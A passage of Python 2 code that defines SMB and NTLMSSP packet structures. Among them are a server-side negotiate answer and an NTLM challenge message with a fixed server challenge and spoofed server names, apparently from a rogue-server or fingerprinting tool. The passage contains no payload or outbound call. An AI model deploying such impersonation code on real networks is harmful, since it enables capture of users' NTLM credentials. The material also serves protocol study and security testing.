("proto", "\xff\x53\x4d\x42"),
("cmd", "\x72"),
("errorcode", "\x00\x00\x00\x00"),
("flag1", "\x00"),
("flag2", "\x00\x00"),
("pidhigh", "\x00\x00"),
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("reserved", "\x00\x00"),
("tid", "\x00\x00"),
("pid", "\x00\x00"),
("uid", "\x00\x00"),
("mid", "\x00\x00"),
])
class SMBNego(Packet):
fields = OrderedDict([
("wordcount", "\x00"),
("bcc", "\x62\x00"),
("data", "")
])
def calculate(self):
self.fields["bcc"] = struct.pack("<h",len(str(self.fields["data"])))
class SMBNegoData(Packet):
fields = OrderedDict([
("wordcount", "\x00"),
("bcc", "\x54\x00"),
("separator1","\x02" ),
("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
("separator2","\x02"),
("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
])
def calculate(self):
CalculateBCC = str(self.fields["separator1"])+str(self.fields["dialect1"])
CalculateBCC += str(self.fields["separator2"])+str(self.fields["dialect2"])
self.fields["bcc"] = struct.pack("<h", len(CalculateBCC))
class SMBSessionData(Packet):
fields = OrderedDict([
("wordcount", "\x0a"),
("AndXCommand", "\xff"),
("reserved","\x00"),
("andxoffset", "\x00\x00"),
("maxbuff","\xff\xff"),
("maxmpx", "\x02\x00"),
("vcnum","\x01\x00"),
("sessionkey", "\x00\x00\x00\x00"),
("PasswordLen","\x18\x00"),
("reserved2","\x00\x00\x00\x00"),
("bcc","\x3b\x00"),
("AccountPassword",""),
("AccountName",""),
("AccountNameTerminator","\x00"),
("PrimaryDomain","WORKGROUP"),
("PrimaryDomainTerminator","\x00"),
("NativeOs","Unix"),
("NativeOsTerminator","\x00"),
("NativeLanman","Samba"),
("NativeLanmanTerminator","\x00"),
])
def calculate(self):
CompleteBCC = str(self.fields["AccountPassword"])+str(self.fields["AccountName"])+str(self.fields["AccountNameTerminator"])+str(self.fields["PrimaryDomain"])+str(self.fields["PrimaryDomainTerminator"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLanman"])+str(self.fields["NativeLanmanTerminator"])
self.fields["bcc"] = struct.pack("<h", len(CompleteBCC))
self.fields["PasswordLen"] = struct.pack("<h", len(str(self.fields["AccountPassword"])))
class SMBNegoFingerData(Packet):
fields = OrderedDict([
("separator1","\x02" ),
("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
("separator2","\x02"),
("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
("separator3","\x02"),
("dialect3", "\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),
("separator4","\x02"),
("dialect4", "\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
("separator5","\x02"),
("dialect5", "\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
("separator6","\x02"),
("dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
])
class SMBSessionFingerData(Packet):
fields = OrderedDict([
("wordcount", "\x0c"),
("AndXCommand", "\xff"),
("reserved","\x00" ),
("andxoffset", "\x00\x00"),
("maxbuff","\x04\x11"),
("maxmpx", "\x32\x00"),
("vcnum","\x00\x00"),
("sessionkey", "\x00\x00\x00\x00"),
("securitybloblength","\x4a\x00"),
("reserved2","\x00\x00\x00\x00"),
("capabilities", "\xd4\x00\x00\xa0"),
("bcc1",""),
("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
])
def calculate(self):
self.fields["bcc1"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
class SMBTreeConnectData(Packet):
fields = OrderedDict([
("Wordcount", "\x04"),
("AndXCommand", "\xff"),
("Reserved","\x00" ),
("Andxoffset", "\x00\x00"),
("Flags","\x08\x00"),
("PasswdLen", "\x01\x00"),
("Bcc","\x1b\x00"),
("Passwd", "\x00"),
("Path",""),
("PathTerminator","\x00"),
("Service","?????"),
("Terminator", "\x00"),
])
def calculate(self):
self.fields["PasswdLen"] = struct.pack("<h", len(str(self.fields["Passwd"])))[:2]
BccComplete = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
self.fields["Bcc"] = struct.pack("<h", len(BccComplete))
class RAPNetServerEnum3Data(Packet):
fields = OrderedDict([
("Command", "\xd7\x00"),
("ParamDescriptor", "WrLehDzz"),
("ParamDescriptorTerminator", "\x00"),
("ReturnDescriptor","B16BBDz"),
("ReturnDescriptorTerminator", "\x00"),
("DetailLevel", "\x01\x00"),
("RecvBuff","\xff\xff"),
("ServerType", "\x00\x00\x00\x80"),
("TargetDomain","SMB"),
("RapTerminator","\x00"),
("TargetName","ABCD"),
("RapTerminator2","\x00"),
])
class SMBTransRAPData(Packet):
fields = OrderedDict([
("Wordcount", "\x0e"),
("TotalParamCount", "\x24\x00"),
("TotalDataCount","\x00\x00" ),
("MaxParamCount", "\x08\x00"),
("MaxDataCount","\xff\xff"),
("MaxSetupCount", "\x00"),
("Reserved","\x00\x00"),
("Flags", "\x00"),
("Timeout","\x00\x00\x00\x00"),
("Reserved1","\x00\x00"),
("ParamCount","\x24\x00"),
("ParamOffset", "\x5a\x00"),
("DataCount", "\x00\x00"),
("DataOffset", "\x7e\x00"),
("SetupCount", "\x00"),
("Reserved2", "\x00"),
("Bcc", "\x3f\x00"),
("Terminator", "\x00"),
("PipeName", "\\PIPE\\LANMAN"),
("PipeTerminator","\x00\x00"),
("Data", ""),
])
def calculate(self):
#Padding
if len(str(self.fields["Data"]))%2==0:
self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
else:
self.fields["PipeTerminator"] = "\x00\x00\x00"
##Convert Path to Unicode first before any Len calc.
self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le')
##Data Len
self.fields["TotalParamCount"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
self.fields["ParamCount"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
##Packet len
FindRAPOffset = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved1"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved2"])+str(self.fields["Bcc"])+str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])
self.fields["ParamOffset"] = struct.pack("<i", len(FindRAPOffset)+32)[:2]
##Bcc Buff Len
BccComplete = str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])+str(self.fields["Data"])
self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
class SMBNegoAnsLM(Packet):
fields = OrderedDict([
("Wordcount", "\x11"),
("Dialect", ""),
("Securitymode", "\x03"),
("MaxMpx", "\x32\x00"),
("MaxVc", "\x01\x00"),
("Maxbuffsize", "\x04\x41\x00\x00"),
("Maxrawbuff", "\x00\x00\x01\x00"),
("Sessionkey", "\x00\x00\x00\x00"),
("Capabilities", "\xfc\x3e\x01\x00"),
("Systemtime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
("Srvtimezone", "\x2c\x01"),
("Keylength", "\x08"),
("Bcc", "\x10\x00"),
("Key", ""),
("Domain", "SMB"),
("DomainNull", "\x00\x00"),
("Server", "SMB-TOOLKIT"),
("ServerNull", "\x00\x00"),
])
def calculate(self):
self.fields["Domain"] = self.fields["Domain"].encode('utf-16le')
self.fields["Server"] = self.fields["Server"].encode('utf-16le')
CompleteBCCLen = str(self.fields["Key"])+str(self.fields["Domain"])+str(self.fields["DomainNull"])+str(self.fields["Server"])+str(self.fields["ServerNull"])
self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen))
self.fields["Keylength"] = struct.pack("<h",len(self.fields["Key"]))[0]
class SMBNegoAns(Packet):
fields = OrderedDict([
("Wordcount", "\x11"),
("Dialect", ""),
("Securitymode", "\x03"),
("MaxMpx", "\x32\x00"),
("MaxVc", "\x01\x00"),
("MaxBuffSize", "\x04\x41\x00\x00"),
("MaxRawBuff", "\x00\x00\x01\x00"),
("SessionKey", "\x00\x00\x00\x00"),
("Capabilities", "\xfd\xf3\x01\x80"),
("SystemTime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
("SrvTimeZone", "\xf0\x00"),
("KeyLen", "\x00"),
("Bcc", "\x57\x00"),
("Guid", "\xc8\x27\x3d\xfb\xd4\x18\x55\x4f\xb2\x40\xaf\xd7\x61\x73\x75\x3b"),
("InitContextTokenASNId", "\x60"),
("InitContextTokenASNLen", "\x5b"),
("ThisMechASNId", "\x06"),
("ThisMechASNLen", "\x06"),
("ThisMechASNStr", "\x2b\x06\x01\x05\x05\x02"),
("SpNegoTokenASNId", "\xA0"),
("SpNegoTokenASNLen", "\x51"),
("NegTokenASNId", "\x30"),
("NegTokenASNLen", "\x4f"),
("NegTokenTag0ASNId", "\xA0"),
("NegTokenTag0ASNLen", "\x30"),
("NegThisMechASNId", "\x30"),
("NegThisMechASNLen", "\x2e"),
("NegThisMech4ASNId", "\x06"),
("NegThisMech4ASNLen", "\x09"),
("NegThisMech4ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
("NegTokenTag3ASNId", "\xA3"),
("NegTokenTag3ASNLen", "\x1b"),
("NegHintASNId", "\x30"),
("NegHintASNLen", "\x19"),
("NegHintTag0ASNId", "\xa0"),
("NegHintTag0ASNLen", "\x17"),
("NegHintFinalASNId", "\x1b"),
("NegHintFinalASNLen", "\x15"),
("NegHintFinalASNStr", "server2008$@SMB.LOCAL"),
])
def calculate(self):
CompleteBCCLen1 = str(self.fields["Guid"])+str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])
Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen1))
self.fields["InitContextTokenASNLen"] = struct.pack("<B", len(AsnLenStart))
self.fields["ThisMechASNLen"] = struct.pack("<B", len(str(self.fields["ThisMechASNStr"])))
self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2))
self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2)-2)
self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen))
self.fields["NegThisMechASNLen"] = struct.pack("<B", len(MechTypeLen)-2)
self.fields["NegThisMech4ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech4ASNStr"])))
self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len))
self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len)-2)
self.fields["NegHintTag0ASNLen"] = struct.pack("<B", len(Tag3Len)-4)
self.fields["NegHintFinalASNLen"] = struct.pack("<B", len(str(self.fields["NegHintFinalASNStr"])))
class SMBNegoKerbAns(Packet):
fields = OrderedDict([
("Wordcount", "\x11"),
("Dialect", ""),
("Securitymode", "\x03"),
("MaxMpx", "\x32\x00"),
("MaxVc", "\x01\x00"),
("MaxBuffSize", "\x04\x41\x00\x00"),
("MaxRawBuff", "\x00\x00\x01\x00"),
("SessionKey", "\x00\x00\x00\x00"),
("Capabilities", "\xfd\xf3\x01\x80"),
("SystemTime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
("SrvTimeZone", "\xf0\x00"),
("KeyLen", "\x00"),
("Bcc", "\x57\x00"),
("Guid", "\xc8\x27\x3d\xfb\xd4\x18\x55\x4f\xb2\x40\xaf\xd7\x61\x73\x75\x3b"),
("InitContextTokenASNId", "\x60"),
("InitContextTokenASNLen", "\x5b"),
("ThisMechASNId", "\x06"),
("ThisMechASNLen", "\x06"),
("ThisMechASNStr", "\x2b\x06\x01\x05\x05\x02"),
("SpNegoTokenASNId", "\xA0"),
("SpNegoTokenASNLen", "\x51"),
("NegTokenASNId", "\x30"),
("NegTokenASNLen", "\x4f"),
("NegTokenTag0ASNId", "\xA0"),
("NegTokenTag0ASNLen", "\x30"),
("NegThisMechASNId", "\x30"),
("NegThisMechASNLen", "\x2e"),
("NegThisMech1ASNId", "\x06"),
("NegThisMech1ASNLen", "\x09"),
("NegThisMech1ASNStr", "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"),
("NegThisMech2ASNId", "\x06"),
("NegThisMech2ASNLen", "\x09"),
("NegThisMech2ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"),
("NegThisMech3ASNId", "\x06"),
("NegThisMech3ASNLen", "\x0a"),
("NegThisMech3ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03"),
("NegThisMech4ASNId", "\x06"),
("NegThisMech4ASNLen", "\x09"),
("NegThisMech4ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
("NegTokenTag3ASNId", "\xA3"),
("NegTokenTag3ASNLen", "\x1b"),
("NegHintASNId", "\x30"),
("NegHintASNLen", "\x19"),
("NegHintTag0ASNId", "\xa0"),
("NegHintTag0ASNLen", "\x17"),
("NegHintFinalASNId", "\x1b"),
("NegHintFinalASNLen", "\x15"),
("NegHintFinalASNStr", "server2008$@SMB.LOCAL"),
])
def calculate(self):
CompleteBCCLen1 = str(self.fields["Guid"])+str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])
Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen1))
self.fields["InitContextTokenASNLen"] = struct.pack("<B", len(AsnLenStart))
self.fields["ThisMechASNLen"] = struct.pack("<B", len(str(self.fields["ThisMechASNStr"])))
self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2))
self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2)-2)
self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen))
self.fields["NegThisMechASNLen"] = struct.pack("<B", len(MechTypeLen)-2)
self.fields["NegThisMech1ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech1ASNStr"])))
self.fields["NegThisMech2ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech2ASNStr"])))
self.fields["NegThisMech3ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech3ASNStr"])))
self.fields["NegThisMech4ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech4ASNStr"])))
self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len))
self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len)-2)
self.fields["NegHintFinalASNLen"] = struct.pack("<B", len(str(self.fields["NegHintFinalASNStr"])))
class SMBSession1Data(Packet):
fields = OrderedDict([
("Wordcount", "\x04"),
("AndXCommand", "\xff"),
("Reserved", "\x00"),
("Andxoffset", "\x5f\x01"),
("Action", "\x00\x00"),
("SecBlobLen", "\xea\x00"),
("Bcc", "\x34\x01"),
("ChoiceTagASNId", "\xa1"),
("ChoiceTagASNLenOfLen", "\x81"),
("ChoiceTagASNIdLen", "\x00"),
("NegTokenTagASNId", "\x30"),
("NegTokenTagASNLenOfLen","\x81"),
("NegTokenTagASNIdLen", "\x00"),
("Tag0ASNId", "\xA0"),
("Tag0ASNIdLen", "\x03"),
("NegoStateASNId", "\x0A"),
("NegoStateASNLen", "\x01"),
("NegoStateASNValue", "\x01"),
("Tag1ASNId", "\xA1"),
("Tag1ASNIdLen", "\x0c"),
("Tag1ASNId2", "\x06"),
("Tag1ASNId2Len", "\x0A"),
("Tag1ASNId2Str", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
("Tag2ASNId", "\xA2"),
("Tag2ASNIdLenOfLen", "\x81"),
("Tag2ASNIdLen", "\xED"),
("Tag3ASNId", "\x04"),
("Tag3ASNIdLenOfLen", "\x81"),
("Tag3ASNIdLen", "\xEA"),
("NTLMSSPSignature", "NTLMSSP"),
("NTLMSSPSignatureNull", "\x00"),
("NTLMSSPMessageType", "\x02\x00\x00\x00"),
("NTLMSSPNtWorkstationLen","\x1e\x00"),
("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
("NTLMSSPNtTargetInfoLen","\x94\x00"),
("NTLMSSPNtTargetInfoMaxLen","\x94\x00"),
("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionHigh","\x05"),
("NegTokenInitSeqMechMessageVersionLow","\x02"),
("NegTokenInitSeqMechMessageVersionBuilt","\xce\x0e"),
("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
("NTLMSSPNtWorkstationName","SMB12"),
("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"),
("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"),
("NTLMSSPNTLMChallengeAVPairsUnicodeStr","SMB12"),
("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"),
("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","SMB12"),
("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"),
("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","SMB12"),
("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"),
("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","SMB12"),
("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"),
("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"),
("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","SMB12"),
("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"),
("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"),
("NTLMSSPNTLMPadding", ""),
("NativeOs","Windows Server 2003 3790 Service Pack 2"),
("NativeOsTerminator","\x00\x00"),
("NativeLAN", "Windows Server 2003 5.2"),
("NativeLANTerminator","\x00\x00"),
])
def calculate(self):
###### Convert strings to Unicode
self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
self.fields["NativeLAN"] = self.fields["NativeLAN"].encode('utf-16le')
###### SecBlobLen Calc:
